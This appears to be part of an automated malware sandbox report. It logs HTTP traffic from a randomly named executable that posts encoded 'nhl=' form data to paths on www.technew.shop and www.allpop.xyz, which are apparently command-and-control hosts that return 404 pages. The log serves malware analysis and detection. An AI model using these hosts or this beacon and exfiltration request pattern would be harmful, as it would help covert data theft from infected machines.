                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                31192.168.11.304985245.56.219.238806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:28.529401064 CEST2578OUTPOST /n2yx/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.technew.shop
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.technew.shop
                                                                                                                                                                Referer: http://www.technew.shop/n2yx/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 76 58 32 75 67 4e 72 2b 68 43 31 2b 50 51 4b 47 6f 73 6e 53 6c 75 44 66 64 6b 5a 4b 47 6a 6c 63 2f 42 42 37 69 4e 50 31 63 55 49 4d 61 66 7a 46 4b 57 62 54 35 35 33 39 39 39 32 66 6b 4f 55 2b 72 64 36 64 4f 69 6e 66 55 6b 64 74 55 32 46 5a 42 69 41 47 79 49 70 57 2f 46 68 31 6a 35 73 6c 39 4d 78 51 66 2f 34 7a 59 79 42 50 44 52 57 39 4f 77 50 69 35 64 5a 78 51 47 74 64 36 32 47 34 75 75 55 69 37 61 6c 7a 56 72 6e 78 53 30 75 42 33 66 51 64 46 57 4b 2f 67 53 55 2f 4a 63 46 41 70 76 68 36 34 70 7a 6e 43 57 70 4f 56 32 70 79 2b 67 70 52 78 62 4b 53 65 6a 56 31 79 57 33 6a 47 41 30 68 45 62 70 64 6d 34 67 32 53 59 7a 46 34 79 56 6a 64 37 4d 4f 51 57 68 53 69 65 74 73 46 49 50 62 65 32 74 30 66 52 44 51 70 44 32 6b 55 30 74 2f 53 32 31 39 57 72 76 6b 2b 32 33 6e 58 31 41 57 4e 44 68 6c 53 33 42 74 58 32 58 46 36 4a 75 79 72 2b 6f 30 4b 38 69 54 46 4e 57 53 67 35 30 72 64 69 55 74 58 34 64 43 6e 47 6e 44 67 64 58 4c 47 4c 30 69 4f 51 42 39 52 6d 46 47 67 7a 66 6d 2f 58 52 41 52 31 4b 4c 6d 49 [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=vX2ugNr+hC1+PQKGosnSluDfdkZKGjlc/BB7iNP1cUIMafzFKWbT5539992fkOU+rd6dOinfUkdtU2FZBiAGyIpW/Fh1j5sl9MxQf/4zYyBPDRW9OwPi5dZxQGtd62G4uuUi7alzVrnxS0uB3fQdFWK/gSU/JcFApvh64pznCWpOV2py+gpRxbKSejV1yW3jGA0hEbpdm4g2SYzF4yVjd7MOQWhSietsFIPbe2t0fRDQpD2kU0t/S219Wrvk+23nX1AWNDhlS3BtX2XF6Juyr+o0K8iTFNWSg50rdiUtX4dCnGnDgdXLGL0iOQB9RmFGgzfm/XRAR1KLmIVomP0AoHA/qoxqtSKD5iqopGTL6pfesLeguX4Li1Y9IevuAuJPN4Iu6niw3blYkBI8ha8OECY4YVPFrs/J55wjlMlhH2genTWc0gaNtQ3dlmGDY1AoncbPzEdKdwF9sVqIDt6Y+wZ6Oy5CeOZguXSOYNmalMzzKcw18fVYwTP+DX+UZ3cINxfAGYTOKvsqNGyXEYLgB4TteYcw8GtEmTail+NsLJIMfrQkgodwowxGKA0YSK1ybNPdTMRJwH0CxGDl+NwaZ9Dz4XdEwvWNVqnErOVTvhu/a3jmLe1qIJiTQLMur1ICj4EFQ8qQj5SaM3Doh63bXD0VAzCEfEiJEc2rsueg3BESUwGE/oE2zrzmhPyP5QDhRWA6YFq7t7yCheaMkaGdd1BTU/52vZNBimG1ED8KaskdH/FtKyPFp5p6F0Tu+Yj7B7BCR7rfIB34Kcs0Sl1N/gWj8ambufu2i0fFAvQO0i4MSdn6IlrOnUOK0ECqOpSHx2xCfXHoT/doKDAmqz6TIYn8WV7h0r/trBcB2567ech6vHVG0I4b+KQBhfc3//i2XAjrNvpdeXlOtNZQIkV63rQVqH0qkD/dd20AxpySUqq76A1Bv1fMhylwFX1Q7q+8ENL+JlZv4MHcmXBB/T0YlF6M4V8A2PTd+2ZPxLPmY6VSrgpq [TRUNCATED]
                                                                                                                                                                Oct 9, 2024 13:04:28.529447079 CEST1166OUTData Raw: 2f 57 49 51 73 61 37 31 44 55 6a 65 71 76 32 57 2f 31 37 34 6b 32 49 79 75 4a 45 4d 33 66 76 52 35 67 70 43 42 45 54 63 58 48 73 64 55 4f 6f 34 6a 43 55 4b 54 62 54 52 64 4b 44 54 7a 73 56 6a 6a 79 4b 51 68 4f 64 6b 73 44 68 6e 49 76 78 63 47 4a
                                                                                                                                                                Data Ascii: /WIQsa71DUjeqv2W/174k2IyuJEM3fvR5gpCBETcXHsdUOo4jCUKTbTRdKDTzsVjjyKQhOdksDhnIvxcGJclu+oOjLfayoLNSi5K4dv8h66ZnY6Oz/FQvoCbgpRItBtRG8llSVpP3rAwg1VQlNI7+IhYRc+1pQF60ZJOumyNXgXE/Q8mnKW5r9MCkWWmWNHNj9YdhduAfHrlj7nffy7C6SuvdYVLqe9kO3US0AN0Pnge8IILgBq
                                                                                                                                                                Oct 9, 2024 13:04:28.650324106 CEST479INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:28 GMT
                                                                                                                                                                Server: Apache
                                                                                                                                                                Content-Length: 315
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                32192.168.11.304985345.56.219.238806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:31.169725895 CEST346OUTGET /n2yx/?9X=EvKH2xeP-DpP307P&nhl=iVeOj9H/jw8/ZkXx4eLZhuHPSRtHACVus0wk2djKTDBvc5j/YX614YP79ezpmvAo29KgRB3gLhtmSCFZBXQ4/utJh3JZlsU8+sR9ZpZpYA5vc3CvDS3ciOs= HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.technew.shop
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:04:31.285075903 CEST479INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:31 GMT
                                                                                                                                                                Server: Apache
                                                                                                                                                                Content-Length: 315
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                33192.168.11.3049854162.0.238.43806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:36.637264967 CEST601OUTPOST /w6me/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.allpop.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.allpop.xyz
                                                                                                                                                                Referer: http://www.allpop.xyz/w6me/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 55 53 39 4e 46 63 61 6b 6a 50 6a 61 4b 67 42 45 36 4a 6d 30 63 71 41 54 50 5a 64 57 59 6d 59 32 51 6e 55 38 4a 75 35 4d 52 31 50 31 43 62 30 39 67 4a 45 78 44 64 35 4e 46 53 6a 36 43 45 70 55 66 62 6d 35 59 51 33 66 70 77 69 2b 64 71 79 53 76 37 62 58 6c 61 79 68 31 53 6c 75 37 42 38 7a 34 6d 62 46 69 2f 54 39 78 6e 39 35 78 67 38 35 4f 72 66 4a 4d 45 68 74 46 74 59 52 2b 75 4c 58 7a 61 77 79 31 66 4c 65 78 56 4f 57 32 50 52 70 4c 6d 4b 7a 4c 49 34 62 66 58 55 61 2f 47 55 67 45 50 57 46 66 45 73 45 39 6d 51 59 44 59 69 76 6c 4b 47 39 4d 57 41 68 4f 39 74 51 64 39 44 76 61 51 3d 3d
                                                                                                                                                                Data Ascii: nhl=US9NFcakjPjaKgBE6Jm0cqATPZdWYmY2QnU8Ju5MR1P1Cb09gJExDd5NFSj6CEpUfbm5YQ3fpwi+dqySv7bXlayh1Slu7B8z4mbFi/T9xn95xg85OrfJMEhtFtYR+uLXzawy1fLexVOW2PRpLmKzLI4bfXUa/GUgEPWFfEsE9mQYDYivlKG9MWAhO9tQd9DvaQ==
                                                                                                                                                                Oct 9, 2024 13:04:36.818108082 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:36 GMT
                                                                                                                                                                Server: Apache
                                                                                                                                                                Content-Length: 389
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                34192.168.11.3049855162.0.238.43806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:39.338570118 CEST621OUTPOST /w6me/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.allpop.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.allpop.xyz
                                                                                                                                                                Referer: http://www.allpop.xyz/w6me/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 55 53 39 4e 46 63 61 6b 6a 50 6a 61 4c 42 78 45 70 75 53 30 4c 61 41 63 54 4a 64 57 50 32 59 79 51 6e 59 38 4a 76 74 6d 52 48 72 31 43 35 73 39 75 6f 45 78 45 64 35 4e 4e 79 6a 46 4d 6b 70 6c 66 62 69 62 59 56 50 66 70 77 6d 2b 64 72 43 53 76 4d 50 55 6b 4b 79 6e 68 69 6c 6f 6b 52 38 7a 34 6d 62 46 69 2f 33 54 78 6e 6c 35 78 78 73 35 50 4b 66 4f 42 6b 68 75 56 39 59 52 36 75 4c 70 7a 61 78 56 31 61 72 34 78 54 4b 57 32 4f 4e 70 49 33 4b 77 41 49 35 53 43 6e 56 32 31 6a 77 76 49 50 65 46 52 6b 34 6b 6c 54 6f 6a 47 50 54 31 34 4a 79 2f 66 32 38 4d 53 38 41 34 66 2f 43 30 48 59 4d 41 4f 69 78 2f 38 52 57 4f 68 69 62 35 7a 6b 61 30 48 69 49 3d
                                                                                                                                                                Data Ascii: nhl=US9NFcakjPjaLBxEpuS0LaAcTJdWP2YyQnY8JvtmRHr1C5s9uoExEd5NNyjFMkplfbibYVPfpwm+drCSvMPUkKynhilokR8z4mbFi/3Txnl5xxs5PKfOBkhuV9YR6uLpzaxV1ar4xTKW2ONpI3KwAI5SCnV21jwvIPeFRk4klTojGPT14Jy/f28MS8A4f/C0HYMAOix/8RWOhib5zka0HiI=
                                                                                                                                                                Oct 9, 2024 13:04:39.509960890 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:39 GMT
                                                                                                                                                                Server: Apache
                                                                                                                                                                Content-Length: 389
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                35192.168.11.3049856162.0.238.43806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:42.039190054 CEST1289OUTPOST /w6me/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.allpop.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.allpop.xyz
                                                                                                                                                                Referer: http://www.allpop.xyz/w6me/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 55 53 39 4e 46 63 61 6b 6a 50 6a 61 4c 42 78 45 70 75 53 30 4c 61 41 63 54 4a 64 57 50 32 59 79 51 6e 59 38 4a 76 74 6d 52 48 6a 31 44 4b 6b 39 75 4c 38 78 46 64 35 4e 52 69 6a 41 4d 6b 70 43 66 62 61 66 59 56 4b 6f 70 79 4f 2b 63 4e 32 53 6b 64 50 55 71 4b 79 6e 6a 69 6c 70 37 42 38 44 34 6d 71 4f 69 2f 48 54 78 6e 6c 35 78 79 45 35 66 72 66 4f 53 55 68 74 46 74 59 46 2b 75 4c 53 7a 61 70 76 31 61 66 4f 78 56 57 57 32 39 5a 70 4c 46 79 77 41 49 35 53 59 58 56 33 31 6a 30 73 49 4c 79 52 52 6c 78 62 6c 44 45 6a 4c 4c 53 56 74 4b 62 67 41 55 6b 46 59 34 49 46 59 75 47 4b 4a 71 5a 67 4b 68 31 4e 2f 79 4f 46 35 56 72 6e 71 55 4f 48 5a 58 4c 41 49 6e 31 62 52 50 33 41 4f 7a 74 6b 70 6c 54 7a 6f 2b 64 51 34 73 35 61 2f 66 79 64 41 45 7a 74 44 31 64 75 73 57 70 38 61 6d 63 41 77 36 50 5a 33 76 73 67 42 62 79 4d 7a 5a 78 57 70 4d 64 54 6b 61 37 71 68 51 6d 55 68 46 44 2f 4f 6b 6f 45 61 52 52 54 6d 37 70 6a 5a 36 45 50 30 36 41 6c 76 4e 33 33 38 43 69 51 42 54 64 55 6e 61 69 36 58 68 6d 74 65 44 [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=US9NFcakjPjaLBxEpuS0LaAcTJdWP2YyQnY8JvtmRHj1DKk9uL8xFd5NRijAMkpCfbafYVKopyO+cN2SkdPUqKynjilp7B8D4mqOi/HTxnl5xyE5frfOSUhtFtYF+uLSzapv1afOxVWW29ZpLFywAI5SYXV31j0sILyRRlxblDEjLLSVtKbgAUkFY4IFYuGKJqZgKh1N/yOF5VrnqUOHZXLAIn1bRP3AOztkplTzo+dQ4s5a/fydAEztD1dusWp8amcAw6PZ3vsgBbyMzZxWpMdTka7qhQmUhFD/OkoEaRRTm7pjZ6EP06AlvN338CiQBTdUnai6XhmteDW/+qJpf515s16vQcomfIXtL3TlqKV/bcRYDvYXN3FJvD0CXqHse1uVIloDIrHWG3zewNJubIb3U6Ea2Qek3rvhpm4IFi+15fSEAZXeOb4KIfZFhsoZ3XXhcpsqoZxZkt5PCaVN4gRaojW0WqBYIx9bGCmbwEK5IwfwZm5ig/az3n8l2XzkzIKuzfb0AeNT58Lt5XRGn1YDUawAOzA0kmRrNzeZZVQS6yPrhv4hfHf/KfHgBqn2/KQMwvpDYwPjYVryOIPH6QKXMykSBwyLRjbF7yFU9xMVWKB/3oJdmTuKRlom8Ar4jpktcmRr174+b1CSlQ539Fh8xpI/Kexy1kv4W1hkMSZIkDKr2ulXYDWGIs3vwCjZOM/6TsnV2VYETzuqbVdrqjXm0qrsbjrQse57rF2RwjG9aPn179f3JIxmWtXADFQlcTXSCwXJJJgMxKJiq6LAte1Hx4NKyZCqKXxA3fe2ZQ++edp6JYvyGzA2vYDVwkZl+Y1/Kj2VQD+7z54kvOitqIVUteYy+mpkkKLnQvttq4qi226Qzr5
                                                                                                                                                                Oct 9, 2024 13:04:42.039239883 CEST2449OUTData Raw: 32 37 64 6e 34 77 51 38 75 67 4e 6a 6f 36 68 67 4c 7a 50 48 55 4d 71 51 76 73 64 6f 4c 67 59 38 4f 53 69 75 6a 35 65 4c 39 43 61 33 6b 64 54 6a 36 42 33 4f 33 48 34 46 4e 64 30 74 57 73 4c 59 33 70 4e 54 63 53 69 47 6e 73 71 77 79 30 74 72 4c 59
                                                                                                                                                                Data Ascii: 27dn4wQ8ugNjo6hgLzPHUMqQvsdoLgY8OSiuj5eL9Ca3kdTj6B3O3H4FNd0tWsLY3pNTcSiGnsqwy0trLYgy0rfZesoQzDUtTtpN3nDXLNoi7zpTKNAlLS6BZP/vL+9EvzG3Pk3G40BSO6BwvyyoAHH6stUvEz2rWIxdp4ox1NA9gW65Vk7ys0F73EKp38n+4f2Xnh72978GD4xsTnyvnZMKBLTxK5W5Kki7gLTEWWZf0jfJqNw
                                                                                                                                                                Oct 9, 2024 13:04:42.211950064 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:42 GMT
                                                                                                                                                                Server: Apache
                                                                                                                                                                Content-Length: 389
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
